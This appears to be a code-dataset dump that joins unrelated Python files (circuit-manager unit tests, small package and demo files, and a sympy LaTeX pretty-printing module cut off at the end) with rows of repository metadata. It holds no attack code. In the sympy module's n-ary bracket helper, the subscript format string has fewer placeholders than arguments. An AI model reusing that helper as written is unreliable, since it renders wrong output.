self.assertEqual(self.cm._buildCircuit.call_count, 1)
def test_replenishCircuits_none(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 0)
# TODO: check call_args for correct type
def test_replenishCircuits_ipv4(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count-1
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 1)
def test_replenishCircuits_ipv6(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count-1
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 1)
def test_replenishCircuits_both(self):
self.cm._buildCircuit = mock.Mock()
self.cm._totalIPv4Count = mock.Mock()
self.cm._totalIPv4Count.return_value = self.cm._min_IPv4_count-1
self.cm._totalIPv6Count = mock.Mock()
self.cm._totalIPv6Count.return_value = self.cm._min_IPv6_count-1
self.cm._replenishCircuits()
self.assertEqual(self.cm._buildCircuit.call_count, 2)
def test_openIPv4Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._openIPv4Count(), 1)
def test_openIPv6Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._openIPv6Count(), 1)
def test_pendingIPv4Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.assertEqual(self.cm._pendingIPv4Count(), 1)
def test_pendingIPv6Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.assertEqual(self.cm._pendingIPv6Count(), 1)
def test_totalIPv4Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._totalIPv4Count(), 2)
def test_totalIPv6Count(self):
mock_circuit_1 = mock.Mock()
mock_circuit_1.circuit_type = CircuitType.IPv4
mock_circuit_2 = mock.Mock()
mock_circuit_2.circuit_type = CircuitType.IPv6
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2}
self.cm._open_circuit_dict = {1: mock_circuit_1, 2: mock_circuit_2}
self.assertEqual(self.cm._totalIPv6Count(), 2)
def test_getOpenCandidates(self):
mock_circuit_1 = mock.Mock()
mock_circuit_2 = mock.Mock()
mock_circuit_3 = mock.Mock()
mock_circuit_1.canHandleRequest = mock.Mock()
mock_circuit_2.canHandleRequest = mock.Mock()
mock_circuit_3.canHandleRequest = mock.Mock()
mock_circuit_1.canHandleRequest.return_value = True
mock_circuit_2.canHandleRequest.return_value = True
mock_circuit_3.canHandleRequest.return_value = False
self.cm._open_circuit_dict = {1: mock_circuit_1,
2: mock_circuit_2,
3: mock_circuit_3,}
test_val = [mock_circuit_1, mock_circuit_2]
self.assertEqual(self.cm._getOpenCandidates(mock.Mock()), test_val)
def test_getPendingCandidates(self):
mock_circuit_1 = mock.Mock()
mock_circuit_2 = mock.Mock()
mock_circuit_3 = mock.Mock()
mock_circuit_1.canHandleRequest = mock.Mock()
mock_circuit_2.canHandleRequest = mock.Mock()
mock_circuit_3.canHandleRequest = mock.Mock()
mock_circuit_1.canHandleRequest.return_value = True
mock_circuit_2.canHandleRequest.return_value = True
mock_circuit_3.canHandleRequest.return_value = False
self.cm._circuit_build_task_dict = {1: mock_circuit_1,
2: mock_circuit_2,
3: mock_circuit_3,}
test_val = [mock_circuit_1, mock_circuit_2]
self.assertEqual(self.cm._getPendingCandidates(mock.Mock()), test_val)
| 39.673469 | 78 | 0.681276 | 2,214 | 19,440 | 5.650858 | 0.056911 | 0.085365 | 0.047958 | 0.055951 | 0.839022 | 0.79506 | 0.787067 | 0.764367 | 0.742786 | 0.724882 | 0 | 0.015654 | 0.227778 | 19,440 | 489 | 79 | 39.754601 | 0.817746 | 0.011317 | 0 | 0.696237 | 0 | 0 | 0.024304 | 0.024304 | 0 | 0 | 0 | 0.002045 | 0.193548 | 1 | 0.096774 | false | 0 | 0.013441 | 0 | 0.112903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
67e56606e3bf5354fda434ade40a481c6d3d5cd3 | 107 | py | Python | idealreport/__init__.py | idealprediction/idealreport | 62f6dfdd56b711e81b64f2d25995108dad3f0844 | [
"MIT"
] | 3 | 2016-07-08T18:07:57.000Z | 2018-08-15T01:10:17.000Z | idealreport/__init__.py | idealprediction/idealreport | 62f6dfdd56b711e81b64f2d25995108dad3f0844 | [
"MIT"
] | null | null | null | idealreport/__init__.py | idealprediction/idealreport | 62f6dfdd56b711e81b64f2d25995108dad3f0844 | [
"MIT"
] | 1 | 2018-02-12T03:49:39.000Z | 2018-02-12T03:49:39.000Z | from idealreport import create_html
from idealreport.reporter import Reporter
from idealreport import plot
| 26.75 | 41 | 0.878505 | 14 | 107 | 6.642857 | 0.5 | 0.483871 | 0.451613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 107 | 3 | 42 | 35.666667 | 0.978947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
db00331ae2ca4c25ba29194474c8d8109c45edd4 | 13 | py | Python | lab1/lex/t.py | CXWorks/compilerLab | 97654acec4ab742b6ec9e1c555e1eab607d3d9a9 | [
"MIT"
] | 3 | 2018-05-04T07:41:21.000Z | 2018-11-16T14:09:29.000Z | lab1/lex/t.py | CXWorks/compilerLab | 97654acec4ab742b6ec9e1c555e1eab607d3d9a9 | [
"MIT"
] | null | null | null | lab1/lex/t.py | CXWorks/compilerLab | 97654acec4ab742b6ec9e1c555e1eab607d3d9a9 | [
"MIT"
] | 3 | 2017-10-24T11:26:12.000Z | 2019-06-05T06:10:33.000Z | a=0110
b=233
| 4.333333 | 6 | 0.692308 | 4 | 13 | 2.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.636364 | 0.153846 | 13 | 2 | 7 | 6.5 | 0.181818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db13b36f2eb399f56f8436032f17295688f0bd52 | 163 | py | Python | ed/l/python/examples/whatever/regex.py | cn007b/stash | bae604d3056f09b9b6c6b3e0282f02c829801f5c | [
"MIT"
] | null | null | null | ed/l/python/examples/whatever/regex.py | cn007b/stash | bae604d3056f09b9b6c6b3e0282f02c829801f5c | [
"MIT"
] | null | null | null | ed/l/python/examples/whatever/regex.py | cn007b/stash | bae604d3056f09b9b6c6b3e0282f02c829801f5c | [
"MIT"
] | 1 | 2021-11-26T05:40:08.000Z | 2021-11-26T05:40:08.000Z | import re
def anum(s: str) -> bool:
return re.search(r'^[\d\w]+$', s)
print(anum('1'))
print(anum('x'))
print(anum('x_'))
print(anum('x-'))
print(anum('='))
| 12.538462 | 35 | 0.558282 | 28 | 163 | 3.214286 | 0.535714 | 0.5 | 0.333333 | 0.5 | 0.433333 | 0.433333 | 0.433333 | 0.433333 | 0 | 0 | 0 | 0.007042 | 0.128834 | 163 | 12 | 36 | 13.583333 | 0.626761 | 0 | 0 | 0 | 0 | 0 | 0.09816 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.125 | 0.375 | 0.625 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
db1dd163c3f236a8b5eedd427d2ddb20812c2f62 | 45 | py | Python | c2nl/utils/__init__.py | chengjunyan1/GN-Transformer-AST | 95b92da9addd694fceeded875bcc56369548322d | [
"Apache-2.0"
] | 8 | 2021-01-20T09:30:41.000Z | 2022-03-01T21:36:25.000Z | c2nl/utils/__init__.py | chengjunyan1/GN-Transformer-AST | 95b92da9addd694fceeded875bcc56369548322d | [
"Apache-2.0"
] | 1 | 2022-01-21T06:30:34.000Z | 2022-03-01T21:35:01.000Z | c2nl/utils/__init__.py | chengjunyan1/GN-Transformer-AST | 95b92da9addd694fceeded875bcc56369548322d | [
"Apache-2.0"
] | 1 | 2022-02-21T22:58:28.000Z | 2022-02-21T22:58:28.000Z | from .logging import *
from .misc import *
| 15 | 23 | 0.688889 | 6 | 45 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 45 | 2 | 24 | 22.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1fdbbadf49c80cec4ae80a81d5061fa8a08da0a | 56 | py | Python | sequencing_tools/stats_tools/__init__.py | wckdouglas/tgirt_seq_tools | 0ab6683ca6b5b748b7d7af7f77dc556f16ccf6f6 | [
"MIT"
] | 7 | 2019-03-12T07:37:53.000Z | 2021-06-23T20:29:35.000Z | sequencing_tools/stats_tools/__init__.py | wckdouglas/sequencing_tools | 0ab6683ca6b5b748b7d7af7f77dc556f16ccf6f6 | [
"MIT"
] | null | null | null | sequencing_tools/stats_tools/__init__.py | wckdouglas/sequencing_tools | 0ab6683ca6b5b748b7d7af7f77dc556f16ccf6f6 | [
"MIT"
] | null | null | null | from sequencing_tools.stats_tools._stats_tools import *
| 28 | 55 | 0.875 | 8 | 56 | 5.625 | 0.625 | 0.444444 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 56 | 1 | 56 | 56 | 0.865385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c028d44e4f8c8a0717887c2ee2ddda8272f9cd32 | 462 | py | Python | neurodsp/utils/sim.py | bcmartinb/neurodsp | 36d8506f3bd916f83b093a62843ffb77647a6e1e | [
"Apache-2.0"
] | 154 | 2019-01-30T04:10:48.000Z | 2022-03-30T12:55:00.000Z | neurodsp/utils/sim.py | bcmartinb/neurodsp | 36d8506f3bd916f83b093a62843ffb77647a6e1e | [
"Apache-2.0"
] | 159 | 2019-01-28T22:49:36.000Z | 2022-03-17T16:42:48.000Z | neurodsp/utils/sim.py | bcmartinb/neurodsp | 36d8506f3bd916f83b093a62843ffb77647a6e1e | [
"Apache-2.0"
] | 42 | 2019-05-31T21:06:44.000Z | 2022-03-25T23:17:57.000Z | """Simulation related utility functions."""
import numpy as np
###################################################################################################
###################################################################################################
def set_random_seed(seed_val=0):
"""Set the random seed value.
Parameters
----------
seed_val : int
Value to set the random seed as.
"""
np.random.seed(seed_val)
| 25.666667 | 99 | 0.350649 | 36 | 462 | 4.361111 | 0.527778 | 0.254777 | 0.178344 | 0.216561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002538 | 0.147186 | 462 | 17 | 100 | 27.176471 | 0.395939 | 0.300866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c069301a216c7f3850ab3dba98edf8ee4f13f1ea | 36 | py | Python | src/coolbeans/extort/__init__.py | runarp/coolbeans | 128a7f2e45690d2d22b05608e555c44334f46859 | [
"MIT"
] | 5 | 2020-05-17T04:48:25.000Z | 2022-01-27T09:36:45.000Z | src/coolbeans/extort/__init__.py | runarp/coolbeans | 128a7f2e45690d2d22b05608e555c44334f46859 | [
"MIT"
] | 1 | 2020-05-17T06:21:52.000Z | 2020-05-22T13:49:33.000Z | src/coolbeans/extort/__init__.py | runarp/coolbeans | 128a7f2e45690d2d22b05608e555c44334f46859 | [
"MIT"
] | 1 | 2021-01-28T03:00:27.000Z | 2021-01-28T03:00:27.000Z | from .base import ExtortionProtocol
| 18 | 35 | 0.861111 | 4 | 36 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fbfa8e5142b3c8fc60f483337d70281339c2b543 | 22,529 | py | Python | ipy_course_tools/formula.py | edualphacruncher/ipy-course-tools | 3ff9145609dc98c8b0e7823688a136a843f2312a | [
"MIT"
] | null | null | null | ipy_course_tools/formula.py | edualphacruncher/ipy-course-tools | 3ff9145609dc98c8b0e7823688a136a843f2312a | [
"MIT"
] | null | null | null | ipy_course_tools/formula.py | edualphacruncher/ipy-course-tools | 3ff9145609dc98c8b0e7823688a136a843f2312a | [
"MIT"
] | null | null | null | from sympy.interactive import printing
from sympy import Matrix, MatrixSymbol, Symbol, poly
from sympy.abc import x
from IPython.display import Math
import itertools
def show_formula(symbol, value, formula_op="=", formula_align=False, display=False):
"""Pretty print a sympy formula. This embeds the formula expression a LaTeX equation with a proper LHS, making it possible to name matrices, expressions in output, etc.
Args:
symbol (string): A standard LaTeX string you would like to be on the LHS of a pretty print.
matrix (sympy.Matrix): The sympy Matrix object you would like to pretty print.
formula_op (str, optional): LaTeX operator symbol. Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
ret_text = f"{symbol} {op} {printing.default_latex(value)}"
if not display:
return ret_text
else:
return Math(ret_text)
def show_matrix(symbol, matrix, formula_op="=", formula_align=False, display=False):
"""Pretty print a sympy matrix object. This embeds the Matrix render into a LaTeX equation with a proper LHS, making it possible to name matrices in output, etc.
Args:
symbol (string): A standard LaTeX string you would like to be on the LHS of a pretty print.
matrix (sympy.Matrix): The sympy Matrix object you would like to pretty print.
formula_op (str, optional): LaTeX operator symbol. Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
return show_formula(
symbol=symbol,
value=matrix,
formula_op=formula_op,
formula_align=formula_align,
display=display,
)
def eval_formula(formula, display=False):
"""Pretty print generic sympy formulaic expression.
Args:
formula (sympy expression): Sympy expression to render.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
ret_text = printing.default_latex(formula)
if not display:
return ret_text
else:
return Math(ret_text)
def unary_bracket(
x,
formula=None,
lbracket_string="(",
rbracket_string=")",
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Internal function to pretty print all unary bracketed formulae with sympy. In particular norms, absolute values, etc. can be printed with this.
Args:
x (string or sympy expression): Content of unary symbol you want to pretty print.
formula (sypmpy expression or LaTeX string, optional): Additional artifacts you want to render along your unary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
lbracket_string (str, optional): LaTeX bracket type on the left hand side of the unary. Defaults to "(".
rbracket_string (str, optional): LaTeX bracket type on the right hand side of the unary. Defaults to ")".
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the unary is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the unary (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if not x_latex:
x_text = printing.default_latex(x)
else:
x_text = x
if subscript is None:
ret_text = f"\left{lbracket_string} {x_text} \\right{rbracket_string} "
else:
ret_text = (
f"\left{lbracket_string} {x_text} \\right{rbracket_string}_{subscript}"
)
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
if formula is not None:
if not formula_latex:
if formula_suffix:
ret_text += f"{op} {eval_formula(formula)}"
else:
ret_text = f"{eval_formula(formula)} {op}" + ret_text
else:
if formula_suffix:
ret_text += f"{op} {formula}"
else:
ret_text = f"{formula} {op}" + ret_text
if not display:
return ret_text
else:
return Math(ret_text)
def binary_bracket(
x,
y,
formula=None,
lbracket_string="(",
rbracket_string=")",
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
y_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Internal function to pretty print all binary bracketed formulae with sympy. In particular scalar products, etc. can be printed with this.
Args:
x (string or sympy expression): Content of binary symbol you want to pretty print, left expression.
y (string or sympy expression): Content of binary symbol you want to pretty print, right expression.
formula (sypmpy expression or LaTeX string, optional): Additional artifacts you want to render along your unary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
lbracket_string (str, optional): LaTeX bracket type on the left hand side of the unary. Defaults to "(".
rbracket_string (str, optional): LaTeX bracket type on the right hand side of the unary. Defaults to ")".
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the binary left is LaTeX (True) or Sympy Expression (False). Defaults to False.
y_latex (bool, optional): Whether the content of the binary right is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the binary (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if not x_latex:
x_text = printing.default_latex(x)
else:
x_text = x
if not y_latex:
y_text = printing.default_latex(y)
else:
y_text = y
if subscript is None:
ret_text = (
f"\left{lbracket_string} {x_text} , {y_text} \\right{rbracket_string} "
)
else:
ret_text = f"\left{lbracket_string} {x_text} , {y_text} \\right{rbracket_string}_{subscript}"
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
if formula is not None:
if not formula_latex:
if formula_suffix:
ret_text += f"{op} {eval_formula(formula)}"
else:
ret_text = f"{eval_formula(formula)} {op}" + ret_text
else:
if formula_suffix:
ret_text += f"{op} {formula}"
else:
ret_text = f"{formula} {op}" + ret_text
if not display:
return ret_text
else:
return Math(ret_text)
def n_ary_bracket(
items,
formula=None,
prefix=None,
lbracket_string="(",
rbracket_string=")",
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Internal function to pretty print all n-ary bracketed formulae with sympy. In particular vector systems, convex hulls, etc. can be printed with this.
Args:
items (list of strings or sympy expressions, has to be uniform): Content of n-ary symbol you want to pretty print, left expression.
formula (sypmpy expression or LaTeX string, optional): Additional artifacts you want to render along your unary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
lbracket_string (str, optional): LaTeX bracket type on the left hand side of the unary. Defaults to "(".
rbracket_string (str, optional): LaTeX bracket type on the right hand side of the unary. Defaults to ")".
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
items_latex (bool, optional): Whether the content of the n-ary is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the n-ary (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if len(items) < 1:
print("No items received, not printing anything.")
return
if not items_latex:
items_text = [eval_formula(x) for x in items]
else:
items_text = items
# Setting up what's going to be inside the brackets
term_count = len(items)
base_string = "{}"
for i in range(1, term_count):
base_string += ", {} "
in_brackets = base_string.format(*items_text)
if subscript is None:
ret_text = "{}\left{} {} \\right{} ".format(
prefix, lbracket_string, in_brackets, rbracket_string
)
else:
ret_text = "\left{} {} \\right{}_{}".format(
prefix, lbracket_string, in_brackets, rbracket_string, subscript
)
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
if formula is not None:
if not formula_latex:
if formula_suffix:
ret_text += f"{op} {eval_formula(formula)}"
else:
ret_text = f"{eval_formula(formula)} {op}" + ret_text
else: # we got latex formula
if formula_suffix:
ret_text += f"{op} {formula}"
else:
ret_text = f"{formula} {op}" + ret_text
if not display:
return ret_text
else:
return Math(ret_text)
def scalar_product(
x,
y,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
y_latex=False,
formula_latex=False,
):
"""Pretty print scalar products of the form <x,y>. Special case of binary_bracket with \langle and \\rangle.
Args:
x (string or sympy expression): Content of left element you want to pretty print.
y (string or sympy expression): Content of right element you want to pretty print.
formula (sypmpy expression or LaTeX string, optional): Additional artifacts you want to render along your unary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the left element is LaTeX (True) or Sympy Expression (False). Defaults to False.
y_latex (bool, optional): Whether the content of the right element is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the scalar product (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
return binary_bracket(
x,
y,
formula=formula,
lbracket_string="\\langle",
rbracket_string="\\rangle",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
x_latex=x_latex,
y_latex=y_latex,
formula_latex=formula_latex,
)
def norm(
x,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
formula_latex=False,
):
"""Pretty print norms of the form |x|. Special case of unary_bracket with \|.\|.
Args:
x (string or sympy expression): Content of the norm you want to pretty print.
formula (sypmpy expression or LaTeX string, optional): Additional artifacts you want to render along your norm. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the norm? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the norm is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the norm (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
return unary_bracket(
x,
formula=formula,
lbracket_string="\|",
rbracket_string="\|",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
x_latex=x_latex,
formula_latex=formula_latex,
)
def eqn_align(eqn_list, display=False):
"""Equation array pretty printing. Requires a list of pre-pared LaTeX strings which are then substituted to an appropriately sized align LaTeX environment. Please make sure that all item elements were generated with alignment characters (c.f. formula_align parameters of bracketed expressions).
Args:
eqn_list ([type]): [description]
display (bool, optional): [description]. Defaults to False.
Returns:
[type]: [description]
"""
if len(eqn_list) < 1:
print("No equations received, not printing anything.")
return
eqn_count = len(eqn_list)
base_string = "{}"
for i in range(1, eqn_count):
base_string = base_string + "\\\ {}"
start = "\\begin{{align}} "
end = " \\end{{align}}"
full_string = start + base_string + end
eqnarray_string = full_string.format(*eqn_list)
if not display:
return eqnarray_string
return Math(eqnarray_string)
def linear_combination(
coefs,
vectors,
formula,
formula_op="=",
formula_align=False,
display=False,
coef_latex=False,
vector_latex=False,
formula_latex=False,
formula_suffix=True,
):
if len(coefs) < 1 or len(vectors) < 1:
print("No coefs or vectors received, not printing anything.")
return
if len(coefs) != len(vectors):
print(
"The number of coefficients and vectors do not agree. Please provide an equal number of coefficients and vectors."
)
return
term_count = len(coefs)
base_string = "{} \\cdot {}"
for i in range(1, term_count):
base_string += "+ {} \\cdot {}"
if not coef_latex:
coefs_interpret = [eval_formula(x) for x in coefs]
else:
coefs_interpret = coefs
if not vector_latex:
vectors_interpret = [eval_formula(x) for x in vectors]
else:
vectors_interpret = vectors
# merge the coef and vector arrays alternatingly
sub_list = [
x
for x in itertools.chain.from_iterable(
itertools.zip_longest(coefs_interpret, vectors_interpret)
)
if x
]
if formula_align:
op = "&{}".format(formula_op)
else:
op = "{}".format(formula_op)
if formula is not None:
if not formula_latex:
if formula_suffix:
base_string += "{} {}"
